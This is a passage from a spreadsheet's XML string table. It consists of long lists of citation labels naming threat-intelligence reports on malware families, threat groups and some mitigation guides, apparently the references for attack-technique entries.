April 2020),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: Donut Github),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: ESET Machete July 2019),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Securelist Machete Aug 2014),(Citation: MacKeeper Bundlore Apr 2019),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Trend Micro Muddy Water March 2021),(Citation: CheckPoint Bandook Nov 2020),(Citation: FoxIT Wocao December 2019),(Citation: CitizenLab KeyBoy Nov 2016),(Citation: Anomali Rocke March 2019),(Citation: US-CERT TA18-074A),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: TrendMicro Tonto Team October 2020),(Citation: ESET Ebury Oct 2017),(Citation: Unit 42 IronNetInjector February 2021 ),(Citation: FBI FLASH APT39 September 2020),</t>
  </si>
  <si>
    <t>(Citation: objectivesee osx.shlayer apple approved 2020),(Citation: Scarlet Mimic Jan 2016),(Citation: Trend Micro Skidmap),(Citation: Chaos Stolen Backdoor),(Citation: NSA/FBI Drovorub August 2020),(Citation: Cisco Talos Intelligence Group),(Citation: CISA AppleJeus Feb 2021),(Citation: Fysbis Palo Alto Analysis),(Citation: trendmicro xcsset xcode project 2020),(Citation: Objective-See MacMa Nov 2021),(Citation: Medium Anchor DNS July 2020),(Citation: CoinTicker 2019),(Citation: ESET LoudMiner June 2019),(Citation: Red Canary NETWIRE January 2020),(Citation: Aqua Kinsing April 2020),(Citation: Unit 42 Hildegard Malware),(Citation: Talos Rocke August 2018),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: sentinelone shlayer to zshlayer),(Citation: sentinelone apt32 macOS backdoor 2020),(Citation: Leonardo Turla Penquin May 2020),(Citation: MacKeeper Bundlore Apr 2019),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Unit 42 Kazuar May 2017),(Citation: Intezer Doki July 20),(Citation: ESET TeleBots Oct 2018),(Citation: Proofpoint NETWIRE December 2020),(Citation: ESET Kobalos Feb 2021),(Citation: objective-see windtail1 dec 2018),(Citation: FireEye Periscope March 2018),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: ANSSI Sandworm January 2021),(Citation: FireEye APT41 March 2020),(Citation: Carbon Black Shlayer Feb 2019),(Citation: 20 macOS Common Tools and Techniques),(Citation: ESET DazzleSpy Jan 2022),(Citation: Fidelis Turbo),(Citation: ObjectiveSee AppleJeus 2019),(Citation: objsee mac malware 2017),(Citation: Trend Micro TeamTNT),</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: Check Point APT34 April 2021),(Citation: Dragos Crashoverride 2018),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Volexity Patchwork June 2018),(Citation: Proofpoint TA505 June 2018),(Citation: ClearSky MuddyWater Nov 2018),(Citation: Proofpoint Bumblebee April 2022),(Citation: BlackBerry Bahamut),(Citation: CobaltStrike Daddy May 2017),(Citation: Trend Micro Qakbot May 2020),(Citation: TrendMicro Confucius APT Feb 2018),(Citation: TrendMicro Gamaredon April 2020),(Citation: Carbon Black Emotet Apr 2019),(Citation: Trend Micro TA505 June 2019),(Citation: Talos PoetRAT April 2020),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: TrendMicro EarthLusca 2022),(Citation: MuddyWater TrendMicro June 2018),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Carbon Black JCry May 2019),(Citation: Lazarus APT January 2022),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: fsecure NanHaiShu July 2016),(Citation: Trend Micro Emotet Jan 2019),(Citation: Malwarebytes SmokeLoader 2016),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: ESET TeleBots Oct 2018),(Citation: Trend Micro Qakbot December 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: ESET Gamaredon June 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Talos MuddyWater Jan 2022),(Citation: FireEye Metamorfo Apr 2018),(Citation: Proofpoint TA459 April 2017),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Cybereason Oceanlotus May 2017),(Citation: VirusBulletin Kimsuky October 2019),(Citation: FireEye NETWIRE March 2019),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Eset Ramsay May 2020),(Citation: 360 Machete Sep 2020),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Palo Alto Comnie),(Citation: Unit 42 OilRig Sept 2018),(Citation: Reaqta MuddyWater November 2017),(Citation: Unit 42 BackConfig May 2020),(Citation: Symantec Emotet Jul 2018),(Citation: G Data Sodinokibi June 2019),(Citation: ThreatConnect Kimsuky September 2020),(Citation: Talos Bisonal Mar 2020),(Citation: Kaspersky WIRTE November 2021),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: TrendMicro MacOS April 2018),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Github Koadic),(Citation: Picus Sodinokibi January 2020),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: Symantec Shuckworm January 2022),(Citation: ESET BlackEnergy Jan 2016),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: PTSecurity Higaisa 2020),(Citation: Proofpoint Leviathan Oct 2017),(Citation: FoxIT Wocao December 2019),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: Rancor Unit42 June 2018),(Citation: Symantec Bumblebee June 2022),(Citation: IBM TA505 April 2020),(Citation: Unit42 Molerat Mar 2020),(Citation: FireEye Hacking FIN4 Video Dec 2014),(Citation: CitizenLab KeyBoy Nov 2016),(Citation: FireEye FIN7 Aug 2018),(Citation: FireEye MuddyWater Mar 2018),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: Talos Frankenstein June 2019),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Talos Lokibot Jan 2021),(Citation: Bromium Ursnif Mar 2017),(Citation: Qualys LolZarus),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Talos PoetRAT October 2020),(Citation: NTT Security Flagpro new December 2021),(Citation: Symantec MuddyWater Dec 2018),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Kaspersky StoneDrill 2017),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: Talos Group123),(Citation: Lab52 WIRTE Apr 2019),(Citation: ESET Telebots Dec 2016),(Citation: Group IB Cobalt Aug 2017),(Citation: Talos Kimsuky Nov 2021),(Citation: Trend Micro Tick November 2019),(Citation: ClearSky Lazarus Aug 2020),(Citation: ClearSky MuddyWater June 2019),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: ESET Grandoreiro April 2020),(Citation: Cyber Forensicator Silence Jan 2019),(Citation: Unit 42 WhisperGate January 2022),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Unit 42 Inception November 2018),(Citation: McAfee Honeybee),(Citation: ATT Sidewinder January 2021),(Citation: Symantec Waterbug Jun 2019),(Citation: Unit 42 Bisonal July 2018),(Citation: CERT-EE Gamaredon January 2021),(Citation: CheckPoint Bandook Nov 2020),(Citation: Securelist MuddyWater Oct 2018),(Citation: Proofpoint TA505 Sep 2017),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Mandiant UNC3313 Feb 2022),(Citation: McAfee Sharpshooter December 2018),(Citation: Crowdstrike Qakbot October 2020),(Citation: FBI FLASH APT39 September 2020),(Citation: Antiy CERT Ramsay April 2020),(Citation: Picus Emotet Dec 2018),(Citation: Flashpoint FIN 7 March 2019),(Citation: Microsoft Holmium June 2020),(Citation: Cyberint Qakbot May 2021),(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: Cofense NanoCore Mar 2018),(Citation: Kroll Qakbot June 2020),(Citation: Anomali MUSTANG PANDA October 2019),(Citation: Talos Cobalt Strike September 2020),(Citation: Kaspersky Lyceum October 2021),(Citation: Juniper IcedID June 2020),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Talos Cobalt Group July 2018),(Citation: Cybereason Chaes Nov 2020),(Citation: Unit 42 Cobalt Gang Oct 2018),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Kaspersky MoleRATs April 2019),(Citation: Microsoft Actinium February 2022),(Citation: US-CERT TYPEFRAME June 2018),(Citation: Donut Github),(Citation: Kaspersky Adwind Feb 2016),(Citation: TrendMicro Cobalt Group Nov 2017),(Citation: SecureWorks August 2019),(Citation: Palo Alto OilRig May 2016),(Citation: Trend Micro Muddy Water March 2021),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Proofpoint NETWIRE December 2020),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: Morphisec Cobalt Gang Oct 2018),(Citation: Talos Emotet Jan 2019),(Citation: ESET Telebots June 2017),(Citation: Securelist Remexi Jan 2019),(Citation: Secureworks IRON TILDEN Profile),(Citation: Unit42 Xbash Sept 2018),(Citation: Group IB Ransomware September 2020),(Citation: McAfee Lazarus Jul 2020),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: Unit 42 KerrDown February 2019),(Citation: win10_asr),(Citation: Default VBS macros Blocking )</t>
  </si>
  <si>
    <t>(Citation: SecureList Silence Nov 2017),(Citation: TrendMicro Lazarus Nov 2018),(Citation: McAfee Gold Dragon),(Citation: Carbon Black JCry May 2019),(Citation: ESET Gelsemium June 2021),(Citation: Volexity SolarWinds),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Sophos Netwalker May 2020),(Citation: NCC Group APT15 Alive and Strong),(Citation: Unit 42 Playbook Dec 2017),(Citation: Symantec Darkmoon Aug 2005),(Citation: Kaspersky QakBot September 2021),(Citation: Trend Micro Ransomware February 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Palo Alto Comnie),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: TechNet Cmd),(Citation: DFIR Ryuk's Return October 2020),(Citation: McAfee Night Dragon),(Citation: CyberBit Dtrack),(Citation: CoinTicker 2019),(Citation: Cybereason Bazar July 2020),(Citation: Picus Sodinokibi January 2020),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: JPCert TSCookie March 2018),(Citation: Rancor Unit42 June 2018),(Citation: FireEye APT37 Feb 2018),(Citation: BiZone Lizar May 2021),(Citation: FireEye APT41 March 2020),(Citation: Talos Frankenstein June 2019),(Citation: FireEye APT10 Sept 2018),(Citation: FireEye Operation Double Tap),(Citation: Cofense RevengeRAT Feb 2019),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: EFF Manul Aug 2016),(Citation: ESET LightNeuron May 2019),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: Group IB Cobalt Aug 2017),(Citation: BleepingComputer Molerats Dec 2020),(Citation: Red Canary NETWIRE January 2020),(Citation: Trend Micro Tick November 2019),(Citation: Unit 42 WhisperGate January 2022),(Citation: Palo Alto MoonWind March 2017),(Citation: ESET Nomadic Octopus 2018),(Citation: FireEye APT34 Dec 2017),(Citation: FireEye APT17),(Citation: McAfee Honeybee),(Citation: Check Point Warzone Feb 2020),(Citation: Threatpost Lizar May 2021),(Citation: Unit 42 Kazuar May 2017),(Citation: Mandiant UNC3890 Aug 2022),(Citation: NCSC Joint Report Public Tools),(Citation: CERT-EE Gamaredon January 2021),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Mandiant UNC3313 Feb 2022),(Citation: FireEye FIN7 March 2017),(Citation: Symantec Buckeye),(Citation: Palo Alto DNS Requests),(Citation: FireEye FELIXROOT July 2018),(Citation: Cofense NanoCore Mar 2018),(Citation: Dell TG-1314),(Citation: US-CERT SHARPKNOT June 2018),(Citation: Symantec Backdoor.Mivast),(Citation: JPCert PLEAD Downloader June 2018),(Citation: JoeSecurity Egregor 2020),(Citation: Cylance Sodinokibi July 2019),(Citation: FireEye FIN6 Apr 2019),(Citation: US-CERT HARDRAIN March 2018),(Citation: Palo Alto OilRig Sep 2018),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Symantec Wiarp May 2012),(Citation: Unit 42 CARROTBAT January 2020),(Citation: ATT QakBot April 2021),(Citation: Lookout Dark Caracal Jan 2018),(Citation: Unit42 OilRig Nov 2018),(Citation: US-CERT KEYMARBLE Aug 2018),(Citation: Fidelis INOCNATION),(Citation: NCC Group Chimera January 2021),(Citation: ESET InvisiMole June 2018),(Citation: ESET EvilNum July 2020),(Citation: Secureworks Karagany July 2019),(Citation: Secureworks BRONZEUNION Feb 2019),(Citation: KISA Operation Muzabi),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Anomali Evasive Maneuvers July 2015),(Citation: CISA EB Aug 2020),(Citation: Cybereason Egregor Nov 2020),(Citation: PWC KeyBoys Feb 2017),(Citation: Lazarus RATANKBA),(Citation: Cylance Shell Crew Feb 2017),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Mandiant APT1 Appendix),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: Dell Lateral Movement),(Citation: ESET TeleBots Oct 2018),(Citation: Symantec Linfo May 2012),(Citation: RATANKBA),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Volexity PowerDuke November 2016),(Citation: FireEye Maze May 2020),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: Avira Mustang Panda January 2020),(Citation: Zscaler Cobian Aug 2017),(Citation: McAfee GhostSecret),(Citation: 360 Machete Sep 2020),(Citation: Lotus Blossom Dec 2015),(Citation: Github PowerShell Empire),(Citation: Rapid7 KeyBoy Jun 2013),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Bitdefender APT28 Dec 2015),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: Unit42 BabyShark Feb 2019),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: CrowdStrike Ryuk January 2019),(Citation: Unit 42 Lucifer June 2020),(Citation: FireEye HIKIT Rootkit Part 2),(Citation: Malwarebytes Higaisa 2020),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: ESET Zebrocy May 2019),(Citation: Check Point Meteor Aug 2021),(Citation: Mandiant APT1),(Citation: Talos Group123),(Citation: Cisco H1N1 Part 2),(Citation: Talos Kimsuky Nov 2021),(Citation: FireEye APT30),(Citation: Sophos SamSam Apr 2018),(Citation: CarbonBlack RobbinHood May 2019),(Citation: Cyber Forensicator Silence Jan 2019),(Citation: Unit 42 TA551 Jan 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: PWC WellMess July 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: Bitdefender FIN8 July 2021),(Citation: NCC Group WastedLocker June 2020),(Citation: Unit 42 Siloscape Jun 2021),(Citation: FireEye FIN10 June 2017),(Citation: Unit 42 Bisonal July 2018),(Citation: FireEye admin@338),(Citation: FireEye HAWKBALL Jun 2019),(Citation: McAfee Sharpshooter December 2018),(Citation: Cybereason Kimsuky November 2020),(Citation: Unit 42 MechaFlounder March 2019),(Citation: McAfee Cuba April 2021),(Citation: Korean FSI TA505 2020),(Citation: ESET GreyEnergy Oct 2018),(Citation: ClearSky Charming Kitten Dec 2017),(Citation: Talos Seduploader Oct 2017),(Citation: ESET ComRAT May 2020),(Citation: Secureworks REvil September 2019),(Citation: Kaspersky Lyceum October 2021),(Citation: Talos NavRAT May 2018),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: Talos Cobalt Group July 2018),(Citation: Zscaler Bazar September 2020),(Citation: Unit 42 SeaDuke 2015),(Citation: FireEye SUNSHUTTLE Mar 2021),(Citation: Palo Alto OilRig May 2016),(Citation: FireEye APT38 Oct 2018),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: Morphisec Cobalt Gang Oct 2018),(Citation: Cyberreason Anchor December 2019),(Citation: TrendMicro Trickbot Feb 2019),(Citation: US-CERT Volgmer 2 Nov 2017),(Citation: Securelist Darkhotel Aug 2015),(Citation: CarbonBlack Conti July 2020),(Citation: Crowdstrike DNC June 2016),(Citation: Proofpoint TA505 Jan 2019),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Talos ZxShell Oct 2014),(Citation: Check Point APT34 April 2021),(Citation: Volexity Patchwork June 2018),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Proofpoint Bumblebee April 2022),(Citation: Trend Micro TA505 June 2019),(Citation: Crowdstrike Indrik November 2018),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Secureworks MCMD July 2019),(Citation: ESET RTM Feb 2017),(Citation: RedCanary Mockingbird May 2020),(Citation: McAfee Bankshot),(Citation: FireEye Periscope March 2018),(Citation: ESET Gamaredon June 2020),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: Dell TG-3390),(Citation: Cybereason Oceanlotus May 2017),(Citation: Deep Instinct TA505 Apr 2019),(Citation: Dell Sakula),(Citation: ESET Hermetic Wizard March 2022),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Unit 42 OilRig Sept 2018),(Citation: PWC Cloud Hopper April 2017),(Citation: ESET LoudMiner June 2019),(Citation: Accenture Lyceum Targets November 2021),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Malwarebytes Pony April 2016),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Lee 2013),(Citation: Forcepoint Felismus Mar 2017),(Citation: Talos Lokibot Jan 2021),(Citation: Proofpoint TA505 October 2019),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: Qualys LolZarus),(Citation: FireEye APT10 April 2017),(Citation: Talos PoetRAT October 2020),(Citation: OilRig ISMAgent July 2017),(Citation: NTT Security Flagpro new December 2021),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: Symantec Suckfly May 2016),(Citation: Checkpoint IndigoZebra July 2021),(Citation: Accenture Hogfish April 2018),(Citation: Fortinet Remcos Feb 2017),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Talos Konni May 2017),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Cybereason StrifeWater Feb 2022),(Citation: Symantec Waterbug Jun 2019),(Citation: Tarrask scheduled task),(Citation: Unit42 RDAT July 2020),(Citation: Umbreon Trend Micro),(Citation: Novetta Blockbuster Destructive Malware),(Citation: FireEye Obfuscation June 2017),(Citation: Cybereason Clop Dec 2020),(Citation: Bitdefender Naikon April 2021),(Citation: Sofacy DealersChoice),(Citation: Talos Cobalt Strike September 2020),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: FireEye APT41 Aug 2019),(Citation: Cybereason Chaes Nov 2020),(Citation: Unit 42 Cobalt Gang Oct 2018),(Citation: US-CERT TYPEFRAME June 2018),(Citation: Kaspersky Adwind Feb 2016),(Citation: CIRCL PlugX March 2013),(Citation: IBM MegaCortex),(Citation: SecureWorks August 2019),(Citation: FireEye CARBANAK June 2017),(Citation: Group IB GrimAgent July 2021),(Citation: Intezer HiddenWasp Map 2019),(Citation: US-CERT Bankshot Dec 2017),(Citation: Microsoft PLATINUM April 2016),(Citation: Group IB Silence Sept 2018),(Citation: PaloAlto DNS Requests May 2016),(Citation: Carbon Black HotCroissant April 2020),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: Dragos Crashoverride 2018),(Citation: Cybereason Astaroth Feb 2019),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Cybereason Molerats Dec 2020),(Citation: Unit42 Cannon Nov 2018),(Citation: APT15 Intezer June 2018),(Citation: ESET Sednit Part 2),(Citation: Talos GravityRAT),(Citation: Zscaler Kasidet),(Citation: Unit 42 Gamaredon February 2022),(Citation: ClearSky Siamesekitten August 2021),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: Cylance Cleaver),(Citation: Sophos Ragnar May 2020),(Citation: Fidelis njRAT June 2013),(Citation: Medium KONNI Jan 2020),(Citation: US-CERT TA18-074A),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Google EXOTIC LILY March 2022),(Citation: Cybereason Soft Cell June 2019),(Citation: Unit 42 BackConfig May 2020),(Citation: Malwarebytes Konni Aug 2021),(Citation: Talos Bisonal Mar 2020),(Citation: Symantec Sowbug Nov 2017),(Citation: Cisco DNSMessenger March 2017),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Github Koadic),(Citation: Symantec Shuckworm January 2022),(Citation: FireEye APT33 Sept 2017),(Citation: PTSecurity Higaisa 2020),(Citation: CrowdStrike Putter Panda),(Citation: FoxIT Wocao December 2019),(Citation: ClearSky Wilted Tulip July 2017),(Citation: ESET Okrum July 2019),(Citation: Unit42 Molerat Mar 2020),(Citation: FireEye FIN7 Aug 2018),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: F-Secure CozyDuke),(Citation: ESET Turla PowerShell May 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: CISA Zebrocy Oct 2020),(Citation: Trustwave GoldenSpy June 2020),(Citation: US-CERT Volgmer Nov 2017),(Citation: Microsoft GALLIUM December 2019),(Citation: Medium Metamorfo Apr 2020),(Citation: Symantec MuddyWater Dec 2018),(Citation: FireEye APT32 May 2017),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: PaloAlto NanoCore Feb 2016),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Malwarebytes DarkComet March 2018),(Citation: Cyphort EvilBunny Dec 2014),(Citation: Talos Sodinokibi April 2019),(Citation: CheckPoint Bandook Nov 2020),(Citation: Cymmetria Patchwork),(Citation: Zscaler Higaisa 2020),(Citation: Unit42 Emissary Panda May 2019),(Citation: ESET Turla Mosquito Jan 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: McAfee Oceansalt Oct 2018),(Citation: Crowdstrike Qakbot October 2020),(Citation: GitHub QuasarRAT),(Citation: Picus Emotet Dec 2018),(Citation: Unit 42 PingPull Jun 2022),(Citation: Flashpoint FIN 7 March 2019),(Citation: ASERT InnaputRAT April 2018),(Citation: GDATA Zeus Panda June 2017),(Citation: Novetta Blockbuster),(Citation: Github AD-Pentest-Script),(Citation: Kaspersky CactusPete Aug 2020),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Anomali MUSTANG PANDA October 2019),(Citation: PaloAlto UBoatRAT Nov 2017),(Citation: Trend Micro IXESHE 2012),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: TrendMicro Cobalt Group Nov 2017),(Citation: FOX-IT May 2016 Mofang),(Citation: Sophos Maze VM September 2020),(Citation: Trend Micro Muddy Water March 2021),(Citation: Proofpoint NETWIRE December 2020),(Citation: Securelist Remexi Jan 2019),(Citation: Unit 42 RGDoor Jan 2018),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Radware Micropsia July 2018),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: Trend Micro Daserf Nov 2017),(Citation: McAfee Babuk February 2021),(Citation: ESET InvisiMole June 2020),(Citation: Forcepoint Monsoon),(Citation: Talos TinyTurla September 2021),(Citation: McAfee Lazarus Resurfaces Feb 2018),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: ESET Sednit Part 2),(Citation: Microsoft SIR Vol 19),(Citation: ESET Sednit USBStealer 2014),(Citation: TechNet Removable Media Control),(Citation: Microsoft Disable Autorun)</t>
  </si>
  <si>
    <t>(Citation: ANSSI Nobelium Phishing December 2021),(Citation: Malwarebytes Kimsuky June 2021),(Citation: CISA AA21-200A APT40 July 2021),(Citation: VirusBulletin Kimsuky October 2019),(Citation: SecureWorks August 2019),(Citation: Google TAG Ukraine Threat Landscape March 2022),(Citation: IBM ITG18 2020),(Citation: Checkpoint IndigoZebra July 2021),</t>
  </si>
  <si>
    <t>(Citation: CISA AA21-200A APT40 July 2021),</t>
  </si>
  <si>
    <t>(Citation: ESET Kobalos Jan 2021),(Citation: ESET ForSSHe December 2018),(Citation: trendmicro xcsset xcode project 2020),(Citation: reed thiefquest ransomware analysis),(Citation: wardle evilquest partii),(Citation: ESET Industroyer),(Citation: ESET Ebury Feb 2014),</t>
  </si>
  <si>
    <t>(Citation: Novetta-Axiom),(Citation: NCSC Cyclops Blink February 2022),</t>
  </si>
  <si>
    <t>(Citation: McAfee Lazarus Nov 2020),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Mandiant APT1),(Citation: Proofpoint TA453 July2021),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: ClearSky Kittens Back 3 August 2020),(Citation: Mandiant UNC3890 Aug 2022),(Citation: KISA Operation Muzabi),(Citation: Certfa Charming Kitten January 2021),(Citation: MalwareBytes SideCopy Dec 2021),</t>
  </si>
  <si>
    <t>(Citation: Accenture HyperStack October 2020),(Citation: Bleeping Computer Op Sharpshooter March 2019),(Citation: ClearSky Lazarus Aug 2020),(Citation: McAfee Night Dragon),(Citation: McAfee Lazarus Jul 2020),(Citation: ESET Lazarus Jun 2020),(Citation: Recorded Future Turla Infra 2020),(Citation: FireEye EPS Awakens Part 2),(Citation: TrendMicro EarthLusca 2022),(Citation: Gigamon Berserk Bear October 2021),(Citation: Crowdstrike Indrik November 2018),(Citation: Talos TinyTurla September 2021),(Citation: Kaspersky ThreatNeedle Feb 2021),</t>
  </si>
  <si>
    <t>(Citation: NSA NCSC Turla OilRig),</t>
  </si>
  <si>
    <t>(Citation: Recorded Future Turla Infra 2020),(Citation: TrendMicro EarthLusca 2022),</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Hildegard Malware),(Citation: Unit 42 Siloscape Jun 2021),(Citation: Peirates GitHub),(Citation: Aqua Kinsing April 2020),(Citation: Docker Daemon Socket Protect),(Citation: Kubernetes Hardening Guide),(Citation: Kubernetes API Control Access)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Hildegard Malware),(Citation: Cisco Talos Intelligence Group),(Citation: Peirates GitHub),(Citation: Trend Micro TeamTNT),(Citation: Kubernetes API Control Access),(Citation: Docker Daemon Socket Protect)</t>
  </si>
  <si>
    <t>(Citation: Dragos Crashoverride 2018),(Citation: Symantec WastedLocker June 2020),</t>
  </si>
  <si>
    <t>(Citation: AADInternals Documentation),(Citation: MSTIC Nobelium Oct 2021),(Citation: MSTIC DEV-0537 Mar 2022),</t>
  </si>
  <si>
    <t>(Citation: Volexity Exchange Marauder March 2021),(Citation: Cybereason Soft Cell June 2019),(Citation: GitHub Pupy),(Citation: Dragos Crashoverride 2018),(Citation: NCC Group Fivehands June 2021),(Citation: Savill 1999),(Citation: Github PowerShell Empire),(Citation: Microsoft GALLIUM December 2019),</t>
  </si>
  <si>
    <t>(Citation: Symantec Calisto July 2018),(Citation: Talos ZxShell Oct 2014),(Citation: BitDefender Chafer May 2020),(Citation: GitHub Pupy),(Citation: KISA Operation Muzabi),(Citation: Trustwave GoldenSpy June 2020),(Citation: Symantec Leafminer July 2018),(Citation: Kaspersky Flame),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: FireEye APT41 Aug 2019),(Citation: aptsim),(Citation: Unit 42 Hildegard Malware),(Citation: Github PowerShell Empire),(Citation: Intezer TeamTNT September 2020),(Citation: FireEye SMOKEDHAM June 2021),(Citation: Savill 1999),(Citation: Kaspersky Flame Functionality),(Citation: Cylance Dust Storm),(Citation: FireEye CARBANAK June 2017),(Citation: Intezer HiddenWasp Map 2019),(Citation: US-CERT TA18-074A),(Citation: ClearSky Pay2Kitten December 2020),(Citation: Proofpoint TA505 Jan 2019),</t>
  </si>
  <si>
    <t>(Citation: ANSSI Sandworm January 2021),(Citation: Malicious Driver Reporting Center),(Citation: Microsoft driver block rules)</t>
  </si>
  <si>
    <t>(Citation: synack 2016 review),(Citation: wardle evilquest parti),(Citation: Securelist Calisto July 2018),(Citation: Objective-See MacMa Nov 2021),(Citation: CoinTicker 2019),(Citation: Red Canary NETWIRE January 2020),(Citation: SentinelLabs reversing run-only applescripts 2021),(Citation: Sofacy Komplex Trojan),(Citation: TrendMicro macOS Dacls May 2020),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: TrendMicro MacOS April 2018),(Citation: MacKeeper Bundlore Apr 2019),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Lookout Dark Caracal Jan 2018),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: CheckPoint Dok),(Citation: ESET DazzleSpy Jan 2022),(Citation: objsee mac malware 2017),(Citation: piazza launch agent mitigation)</t>
  </si>
  <si>
